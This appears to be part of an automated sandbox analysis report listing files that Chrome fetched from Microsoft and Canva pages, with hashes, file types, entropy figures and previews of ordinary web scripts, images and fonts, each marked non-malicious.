                                                                                                                                                              SHA-512:8C26E45CA37AC5DCCCC0C7BBCA92E0E8E11FB807A6D9A6916D5A0CC1CF198A7942DD5583C31ACBD1A11DDE004C252806D205E9CFDA7F494A6F7D5BBFA42920E4
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/universalheader/v1/universalheader/clientlibs/site.min.ACSHASH1dabd5cc3f7b68c178b59ea74dc62947.js
                                                                                                                                                              Preview:'use strict';(()=>{function m(f){var e=G[f];if(void 0!==e)return e.exports;e=G[f]={exports:{}};return I[f](e,e.exports,m),e.exports}var I={1623:()=>{$(function(){function f(){-1!==document.cookie.indexOf("".concat("Cascade.AuthSSO","\x3d"))&&(document.cookie="".concat("Cascade.AuthSSO","\x3d; expires\x3dThu, 01 Jan 1970 00:00:00 UTC;"))}function e(){var a=function(){var d=document.cookie.match(/(^|;\s*)(Cascade.AuthSSO)=([^;]*)/);return d?(d=parseInt(decodeURIComponent(d[3])),!isNaN(d)&&d>n.DefaultAttempted?.n.SharedStateAttempted:n.DefaultAttempted):n.NotAttempted}(),c=!(!window.msauthRpsShare||b.accountConstraint===w.AAD);if(a===n.NotAttempted||c&&a!==n.SharedStateAttempted)!function(d){$("#".concat("cascadeauthsso")).remove();var g=document.createElement("iframe");g.src=d;g.setAttribute("width","0");g.setAttribute("height","0");g.setAttribute("border","0");g.setAttribute("frameborder","0");g.setAttribute("style","display: none");g.id="cascadeauthsso";document.body.appendChild(g)}(""
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (47691)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):47692
                                                                                                                                                              Entropy (8bit):5.401573598696506
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:B0B3774E70E752266B4CF190E6D95053
                                                                                                                                                              SHA1:03823D33D8C374DD69B66F1D75A5FC93D29967E1
                                                                                                                                                              SHA-256:A9F0787E39291D7BCB873D0D514F1D2C8DB0256FD741C2ABC4D46A809254E141
                                                                                                                                                              SHA-512:8060AA547C3F32930EC2A3786A6BB15054F396D8EAB238EA34E881C2EEAE0D013AF246FDDE85DA8A5BFC2690B1EB26E5138B45BAA28479264DB3BA458D4055A8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (691)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):838
                                                                                                                                                              Entropy (8bit):5.427719717308607
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:5507822C8B7052D76620B3113C856553
                                                                                                                                                              SHA1:396BFE26381C4CC7160C97D269B933CC487A94C8
                                                                                                                                                              SHA-256:FC0D86B92CEB0ED7A7468E766771C0AAC84C91EE55EB6F91276EF7B88393537D
                                                                                                                                                              SHA-512:7D17FB3AD016D363AB1067B778C6F3D04039F879B0026805DBD926E07FBF70C1AA7241AFD2261B268AA86ED1F0660B9037E0947710C8D3614F5E897A05400469
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RC1c94de512bb2445e83703950b946654d-source.min.js
                                                                                                                                                              Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RC1c94de512bb2445e83703950b946654d-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RC1c94de512bb2445e83703950b946654d-source.min.js', "function areNonEssentialCookiesAllowed(){function e(){Munchkin.init(\"157-GQE-382\",o)}console.log(\"munchkin starts\");var n=document.createElement(\"script\");n.src=\"https://munchkin.marketo.net/157/munchkin.js\",document.head.appendChild(n);var o={cookieAnon:!1,cookieLifeDays:365};console.log(\"munchkin end\"),setTimeout((function(){e()}),3e3)}var ruleCorrelationGuid=\"KIF-160e3ca9-547d-468d-b59b-76710f887a7c\";console.log(ruleCorrelationGuid+\": Launcher Rule Fired\"),setTimeout((function(){areNonEssentialCookiesAllowed()}),3e3);");
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (3815)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):3962
                                                                                                                                                              Entropy (8bit):5.418810333171469
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:8480B3AAF2073913CF234F0530363AE0
                                                                                                                                                              SHA1:B8DD998EC97D598977550CFCBC370610284EB65E
                                                                                                                                                              SHA-256:6B747CA1BFE3E78DCF809137FC4A06AC056DFAD15DDF5BB6D44CE815B72691C1
                                                                                                                                                              SHA-512:C4C3901E972C711D720D532FAA6F0622C3BD938E19C399491603F4F55CF762943FDA89EA5C223C01A53E791414732D15069755202A2F91BC1CF5AF50BDCB6B2A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RCa0059efdf53d4c19be7d008a0a7abf0a-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RCa0059efdf53d4c19be7d008a0a7abf0a-source.min.js', "window.WebBlendsLoader=window.WebBlendsLoader||function(){function t(){for(var t=window.location.pathname,e=0;e<v.length;e++){var o=t.length-v[e].length;if(o=\"/\"===t[t.length-1]?o-1:o,t.substr(o,v[e].length)===v[e])return!0}return!1}function e(t){var e=document.createElement(\"script\"),o=document.createElement(\"div\");e.setAttribute(\"src\",f),e.setAttribute(\"async\",\"\"),e.addEventListener(\"load\",t),o.setAttribute(\"id\",c),o.style.display=\"none\",document.head.appendChild(e),document.body.appendChild(o)}function o(){var t={ParentElementId:c,Environment:a,Flight:w,ClientType:d};WebBlender.preLoadBlend(t)}function n(e){var o=window.location.origin+window.location.pathname;(p.test(o)||b.t
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (65455)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):204452
                                                                                                                                                              Entropy (8bit):5.28093716766383
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:02D8436722F1F2095DC9706BBF600D74
                                                                                                                                                              SHA1:8862AE77407622FB9B7081EE807973DD930075EC
                                                                                                                                                              SHA-256:6A43C8C19F7C91478E2E69151C1D33D3D948CCAA0265E5B17C5DEA14999115B9
                                                                                                                                                              SHA-512:96698ED454F9C89CFC0ED2294D5D6B48942D659D70925D180CF52D75A080C2158FE53BE78FF8FF0BECBDCD3EF2BB7F3BB0DA61F413EECE015FECBFBBA141994F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://static.canva.com/web/387e316e7fce97e3.vendor.js
                                                                                                                                                              Preview:/*! For license information please see 387e316e7fce97e3.vendor.js.LICENSE.txt */."use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[2653],{40749:(e,t,n)=>{n(366995)},736241:(e,t,n)=>{n.d(t,{DT:()=>o.D,FY:()=>o.F,Pi:()=>u.P,fv:()=>s.f,jd:()=>l.O});n(454648);var r,a=n(404935),i=n(695578),o=(n(366995),n(775328)),l=n(751586),u=n(364620),s=(n(40749),n(818321));n(948591),n(24765);(0,i.z0)(a.m);r=l.O.finalizeAllImmediately},364620:(e,t,n)=>{n.d(t,{P:()=>d});var r,a,i=n(875604),o=n(775328),l=n(366995),u="function"==typeof Symbol&&Symbol.for,s=null!==(a=null===(r=Object.getOwnPropertyDescriptor((function(){}),"name"))||void 0===r?void 0:r.configurable)&&void 0!==a&&a,c=u?Symbol.for("react.forward_ref"):"function"==typeof i.forwardRef&&(0,i.forwardRef)((function(e){return null})).$$typeof,f=u?Symbol.for("react.memo"):"function"==typeof i.memo&&(0,i.memo)((function(e){return null})).$$typeof;function d(e,t){var n;if(f&&e.$$typeof===f)throw new Error("[mobx-react-lit
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):681
                                                                                                                                                              Entropy (8bit):5.043291133932798
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:104138E7B8F89DBF7CC66485544A0669
                                                                                                                                                              SHA1:7C3F43BDA4BAF55F893876DC62B55800E194F135
                                                                                                                                                              SHA-256:FCA9EEC67C99F083AF9AA30169AF20B7DE12949D45A48FACC70B061F1F0FCBE0
                                                                                                                                                              SHA-512:7BE127AE63F31606BFC909476F8ACF4857726E6C5A7CCCE06FF6EB713CFA328DB58B2FBDBBB298D59030CED8853AEE4771D865DCAA487871E6F71E79CE687F98
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:<svg width="43" height="32" viewBox="0 0 43 32" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_14400_15452)">.<path d="M0 14.9335C0 6.68606 6.65493 0.000183105 14.8642 0.000183105H28.1358C36.3451 0.000183105 43 6.68607 43 14.9335V17.0669C43 25.3143 36.3451 32.0002 28.1358 32.0002H0V14.9335Z" fill="#004275"/>.<ellipse cx="12.6195" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.<ellipse cx="21.0326" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.<ellipse cx="29.4457" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.</g>.<defs>.<clipPath id="clip0_14400_15452">.<rect width="43" height="32" fill="white"/>.</clipPath>.</defs>.</svg>.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (59832)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):99505
                                                                                                                                                              Entropy (8bit):5.20600737523251
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:895E2A12062F1EE44D7D72D266904BDE
                                                                                                                                                              SHA1:896B8B40961C524472FB84C4760160267A3B89A6
                                                                                                                                                              SHA-256:D2AEA4BA12C00A853C03EB8EA9575338D1A21D15314B39B9A7AA039016E6FC93
                                                                                                                                                              SHA-512:5673B54ECFF13BB7263EA98A554B8DEB04C5C2151B164F0A3A1411D9BB624C0395147D618C7C3381F263EAF5EECAA0E7EDC479DB9ABDC1A611110C2DC4610D2A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:// ***************************************.// config file for at.js lib.//****************************************************************************.// SET TARGET PROPERTY HERE:.const at_property = window.cas.exp.target.propertyToken; // Workspace Name.// ***************************************************************************.! function () {. window.tt_getCookie = function (t) {. var e = RegExp(t + "[^;]+").exec(document.cookie);. return decodeURIComponent(e ? e.toString().replace(/^[^=]+./, "") : ""). }. var t = tt_getCookie("MC1"),. e = tt_getCookie("MSFPC");. function o(t) {. return t.split("=")[1].slice(0, 32). }. var n = "";. if ("" != t) n = o(t);. else if ("" != e) n = o(e);. if (n.length > 0) var r = n;. if (n.length > 0 && at_property != "") {. window.targetPageParams = function () {. return {. "mbox3rdPartyId": r,. "at_property": at_property,. ...(win
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):110299
                                                                                                                                                              Entropy (8bit):7.99831807445594
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:AED1F8C3D2D803C5C273B47964334B94
                                                                                                                                                              SHA1:48EA85D96CB6A69F0BDB58D8827A8D85DAE731F2
                                                                                                                                                              SHA-256:BB96F34AE986A36BF72CA34E0C97F3CF662B24A24F1B5D555B1E0E15B73C294D
                                                                                                                                                              SHA-512:6A736A72C78D7289EBF91A60FC598CE4959DBD1C30298AF6958580A552982E8FEE5F9E09BAA02D2E46480FF8F2FA81CB7A04C67600C6E8356BCF615A7CB36EB7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_PBICapabilities_1.3?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe...........&....pixi............av1C........colrnclx...........ipma...................mdat.....*..%....B2...D$..A.P...E....qG2..0P.l..?b..nX...Y.&A.....ZXX...c.....pc...B}.c....g.}.....T.;7......4......\.\....v{?.5....>w..Y]..b.L..1.;..NNQh....[.E...>3.u..(X(j........SLL......+.....x...4......i...%.;.$.......{.ss.>E.d...s.Jb.O\g..>"...p..fl......[vtp.y..Nu.k..>.].%W;diL.;..sTI.Y;J.N..nY...].].Ndh.."....+...GF]!.3.......io.F.....v4.f3..G.E...CK_.T...Q......IA..U..4....u.4..F2....S.2.q...>R..4..o....$...d..oC...Ka....B...A...9.bH.X.....Yw3R;.....E.....&.y.....91.Xf.A...s.S[hR9.......8.D`....~....E.A..|........P.d....jWt@#.xy..s'"9....+.O.Y.k........j.g.=....Y{...K...n...J...*...Q...-...B........%f..&..y.e.0r.).).`0.k.}6....rz|..|....@IC....}*.XF.bo.u.>.uz...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 38848, version 1.655
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):38848
                                                                                                                                                              Entropy (8bit):7.993669247804477
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:CFF149EE1E9D2BE50AC77BCD86769D05
                                                                                                                                                              SHA1:A1B8A95DDFE811A098D0298E83DD711E90943732
                                                                                                                                                              SHA-256:C84DE7E52D68BD3B651219E7085236BABC85A0C7C79F21A14F0CDDDBD0FB4B4C
                                                                                                                                                              SHA-512:D27E713343F51A75E909B4A01D3F2FFB95EE82E13A1B21A9D3034D3858579E4C3FEBAE76E1AF706B820E51583254281E256B825F1742167E1E072DC59CDF1AE4
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://static.canva.com/web/images/cff149ee1e9d2be50ac77bcd86769d05.woff2
                                                                                                                                                              Preview:wOF2..............%(...L..............................j...?HVAR.^?MVARZ.`?STAT$'(..N/....D.|0....6.$..|..... ..>. [..q..W.....sgtY.....C.m..X=e...`...~9...?-....h[U.t.-.\..Q.zkm..,..k..RP4...%Z#_1q...H...A.P.T.s#..Q...;......[...H|..C....i....AW....V....r..'.....`...$r.C$C$..8&.....]:v\x&N..q..........}..+.Q.$OJ............./.Wdb.a..........}.<....}//..B...BHB.!.K.+.).kT#.J).".Xa,e.JqQDtW..o...R..v.W...........;]..w...........7C0.N.^Q.m.......bAn..c8b...VD..(...Q"Z..y..1...o..O_......L.._.f.&........LC.Z................N....=.Y..]...h.).|....&.1B.....6..].R..3.t)....i........#...`.B.8..D.E\V.(5*...O2..7..93.:.l6.$.B....>._...9..FE.........V.........1...0Al.5g=.....:/...L..3.b......7....... ......j...u...F)......e.g.Xf"C..e...3=..#...y...w...I.@.O.>.J.$........{S.V...e8B.. ."J9..DD."27k"VD..(...}...LHT...a.6-...r..m~.........~.?...NI...!..'F(b.....xb...(."~u...Q..&:.....9#Gm.D....D.&....R|.D..N...:...".......II'.w_#..X...&:..WQ...|...oj...RzP....T|
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):56791
                                                                                                                                                              Entropy (8bit):7.995905639820864
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:2ED5FF110AB66AC1232CC442C63D3112
                                                                                                                                                              SHA1:FF78C9E535FF414CB0AE7E74814D7EC51EF2A1E0
                                                                                                                                                              SHA-256:E8ACD30833BD8FC3C3CF72608DE6B20A650E88A731C84EE733E749EE67C5E88C
                                                                                                                                                              SHA-512:69E61ED4759612068C083A31F6A242C5A731E6E942CAE1363FD044B92172579349A48A1A9DDF4A4E1F10E5DC3EEB70CC02AF20B3DD44F1A5086703E62DFEE275
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_WhyPBI_2.4?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...................(iinf..........infe........av01Color....jiprp...Kipco....ispe...........&....pixi............av1C........colrnclx...........ipma...................mdat.....*..%..B2....,.M4.A$@....p...,p..D*.u......6.M.v8hJ.Q2 .C..`..:./I{.&..Q..dU.l..|....{...!X41...`....)1X.$..q.8.e@..xy...x..+3,.w.b9.:K..K. ...b.T^N......Y...b.....h:..../..;..w|Ph.N>.....!h.<...'.,T..o3.e@.5.._k.m....;..F....`x....-d. #s.crU_o........P......:..7v>M....U.. ..-...Z...'...fz..#@Q..j...kDb...#B.\!..o.q.?....]GIF3.......>.T..l,.\..r.Y.PH;..Y...zeSZ[..rm.....K,..i5V..<....s. B..q.^y....|..Ro.. ....]N.R.T.......2.T.*xh...H....D.+.j...;}..An..wY..?b....."U.......n[&..w%,n?cQ:...G....9..a.Zh.,.R...Q-..%g......x..Ee$....hd..T..m.W.J7..xz.\0B.~..C.W..z.`^.,.A..O..h@....V..=LqV.q.........:E...B...Y.FC...........W......a.".x.y.5il..Es:9.].....@....Y..-@.V..!N.......<.&(..F
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (541)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):9516
                                                                                                                                                              Entropy (8bit):5.529991314066427
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:8B51A976B2F24B5C747CD9DFF2D593ED
                                                                                                                                                              SHA1:459BC3E2D04B309873BFFD31E2924A0F4C04A303
                                                                                                                                                              SHA-256:640A401EF807204873F6F29F1825BF7400035432BDFD51361EDC487D17099DF0
                                                                                                                                                              SHA-512:49438DB8B6FF730A8EF93C8C524C140EC46414BF08AEF1E593BA05D133A6F15EDC0D20106DE5CE0535BA7B44D300461A16E60AE04A1B3AE463237E97EE445C62
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://munchkin.marketo.net/157/munchkin.js
                                                                                                                                                              Preview:/*. * Copyright (c) 2007-2018, Marketo, Inc. All rights reserved.. * See https://developers.marketo.com/MunchkinLicense.pdf for license terms. * Marketo marketing automation web activity tracking script. * Version: 157 r760. */. (function(n){if(!n.MunchkinTracker){var k=n.document,q=k.location,B=encodeURIComponent,C=null,D=[],r=function(b,a,d,c){try{var e=function(){try{d.apply(this,arguments)}catch(a){}};b.addEventListener?b.addEventListener(a,e,c||!1):b.attachEvent&&b.attachEvent("on"+a,e);D.push([b,a,e,c])}catch(h){}},R=function(b,a,d,c){try{b.removeEventListener?b.removeEventListener(a,d,c||!1):b.detachEvent&&b.detachEvent("on"+a,d)}catch(e){}},e=function(b){return"undefined"!==typeof b&&null!==b},E=function(b,a){return b.className.match(RegExp("(\\s|^)"+.a+"(\\s|$)"))},S=e(n.XMLHttpRequest)&&e((new n.XMLHttpRequest).withCredentials),t=function(b){var a=null,d;if(e(b))if(0===b.length)a="";else try{a=decodeURIComponent(b)}catch(c){d=b.indexOf("?");if(-1!==d)try{a=decodeURIComponent(
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):54852
                                                                                                                                                              Entropy (8bit):7.995793807875751
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:FE7BAE6AC2A53CCE6AF07DBB34AB339F
                                                                                                                                                              SHA1:647E1ECEC356C994AD6035DCC7569AF0395848CA
                                                                                                                                                              SHA-256:F978E502F47F16AC4B156B8893146F1F73ECD5FF92F208699A5D5087A04ADF7C
                                                                                                                                                              SHA-512:CCD9965996F82F8D436CBCC04B745ABF32A3FE7B09B3BEAC0CC73E9F7F881A4FA5563080F3FA49B0CF5DA0904DB9C759808C23391B7C9D025ADCC5DEE86DC126
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_PBICapabilities_1.4?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................*...(iinf..........infe........av01Color....jiprp...Kipco....ispe...........&....pixi............av1C........colrnclx...........ipma..................2mdat.....*..%....B2...D$..A.P...OJm*..JZ............5.}....*.O6@.4..S....w...~/c+..............~L].`..D..wA...qzhh...Ki...t...k^OF.zY...b.m2+^..M...m..-9.*....e..3..Yl{..|..}... ..x...I..;..(Sa...e......;/&......a..}u.p..^5....Xl1......&.3..2Q.~5.h.....C(Af.2...o..a..J.f....$.\q....)...A...h.c~d`.a.2.?...j.~..id....N.....=....2..1.+..r.|_.?=<.w......a..........3@.7..-....!R.t....g.!1.UviX/DE..E.....G{T.i..q...Li.lu..c.S..}..52 ..-U..y.]-8.P..8..s&...^..<WfJS.s.X...B.._L.[4.....3w......])f...J;o|$'.s..k.C.-N.._.W.T..RO.....HAh..?....(.v.....Q-IS..M..(+...F......nB.+.....2EAD..r.S.MK3.T.-A. .4.....z1.%l.6..:2.2.L:<...\...t......m..M.hf.y.j9,a...D.....Q.Q>..n..Z.......8.../&...3&.rY....e..N..^
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 27652, version 1.28835
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):27652
                                                                                                                                                              Entropy (8bit):7.991828773312673
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:CA021CCD30AC383F134C6F4C6C9B905D
                                                                                                                                                              SHA1:5397761812C54A8EDED0773843E3E01AE087BD8A
                                                                                                                                                              SHA-256:175046E68FF8F49A59D8C9D3AA079BED92C6BBE9F17F311D298AE929FC87DFE5
                                                                                                                                                              SHA-512:C7E661BB905587962A82D9A275346CD67A146112F069F0FD69C1517E9FA36AD1B32C6DF2F701E1F8900D7736A94C44011290BED7DCFE12603934C45866848553
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-mwf-new/resources/fonts/MWFFluentIcons.woff2
                                                                                                                                                              Preview:wOF2......l...........k...p........................`..F......e.6.$..(..V.. .......r...6-.w;.N..3#(i...@...........$.c....Q>....H.F!...I.....wKB..8....p.5...j.q..U.B......aG.s./&.7~........v6.-e..G..;%.=%..(..[Ii.......8x.7\.../.v.@......a/..EOx...:.....h.T>..p.0..M.p.!..R(-!.lH!.QZHB.d.N..Pjh=4.gU..Q..`....h'.+.w.O.;.^.,..?....J.v.{Qy+..~.d..z......]c..N.|.....2....-...[.-.b...?GP9...T.=.Y..d....A.$...!..M+.........t..{W...C.^..1....`Y`....&..&.=..fH...nmV.9pl.....A.:8...$u.......u..T-.'...H.........a.2....KWX. . ....#.Q)5.Q!.~.g...,?.....0..g.Z..:.Y..s...{G.......`.C.V../^x)........7..*n..RJ.e....@R..8.....m4.+.G...o.M.l.RT..p....R..9.U,.f..13.ID.`.D..2K.;3..... .KB..3.t..+....9:...su...>W.].t.R..+].)._..&..IS..1fg..\...M...._..W(..aCtIa...-*K3.....p..f.L..R.n.5..X2&.g.~..m.o..s*m...Y.M..C...X..o..QQp........7..9.....$.H.....0..c.V.Z,..0..'.s..%..`.E.|........4`hC..`N..f...@....U./H$h{..[.>...Y....h..{.#=.1-.E ......#$..D...=...N..|...P.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):836
                                                                                                                                                              Entropy (8bit):6.944112371702667
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:A4D31E77D95CABD70E5D88128E03F114
                                                                                                                                                              SHA1:AA682837F93B9956F81C387EC850EDA852ACE98B
                                                                                                                                                              SHA-256:214A848E042AAE43FFF9C74154FCE5331503F71DB2FC430C62C027C3F93B3311
                                                                                                                                                              SHA-512:52F589A222AB40F0A8F5CAF8AA8F90CA371E67BB6AA2E17C36B8103EDB1232218AB6357ACA8C26D09BB6D706CA515EAC58197BE82E7286C58EDC24BB256E1011
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Social_Media_Logo_FB?scl=1
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................*...(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma..................2mdat........h...B2......Q...:w...L?....F2.9c......e.n[...X..A..Aa.?..2.._.y.8.h....n....4..........~.i....j...}r....lD...O......_.g..L....b..r.W$WR.3.nBe..(...".....a.a./..B......#.N..P^..[D...(5.z..;#E.X..*..1..Tb.GT2.{P^........o........G7....^i.|..".Kx..e)-.MK....u{.y..?.U..p...I$...t/_.[.x.P.3.2..t..:.ii$P.I.../...qV.VBt.....x.wLZe.g...0R.0.K'.H~..o....,Y6.A6N.-I?.b...y.yL.!..ba..\|X!u...&...g......3.....N...oI...Q..E.....<.*%...0.......a..<...f..c.p..i.F.....J. ..:,....4.r.Qa...P/.=.].UV!4.e1..Tu.?.....R..H..+NX.#i...28.4QY..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:C++ source, ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):3280
                                                                                                                                                              Entropy (8bit):4.696081700274861
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:1C7E214F5AF8CAA06F783A38D40127C6
                                                                                                                                                              SHA1:61F88B722FAA7A7AE86D354DBCFC1D771FF23289
                                                                                                                                                              SHA-256:9EA42247944D18B77EB76FBCCAF1774559B6F312B1376002F553C4ECB827E4C5
                                                                                                                                                              SHA-512:559A3FA3364B742E5915E871333C043CF27F25110D3A624D0CDDC75DEE795F8633EB0C8A3186F2088B52516C1BC3A90F13545F9415278F3A4A52992AB7E8C96C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:class OneCloudUtil {.. /**. * Get the API endpoint for the OneCloud Data Connector.. * @param {string} path - The path to append to the API endpoint.. * @param {string} querystring - The query string to add to the API endpoint.. * @returns {string} - The API endpoint with the environment specific query parameters.. */. static getMsocapiurl = (path, querystring) => {. let url = `${OneCloudEnvironmentConstants.DataConnector.endpoint}${path}`;. let envQueryParamKeys = Object.keys(OneCloudEnvironmentConstants.DataConnector.queryParams);.. // Add passed query string.. if(querystring && querystring.length > 0) {. url += `?${querystring}`;. } else if (envQueryParamKeys.length > 0) {. url += '?';. } .. // Add environment specific query parameters and return.. return OneCloudUtil.addEnvironmentSpecificQueryParams(url);;. }.. /**. * Add environment specific query parameters to the url.. * @param {string} url - The url to add the query paramete
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
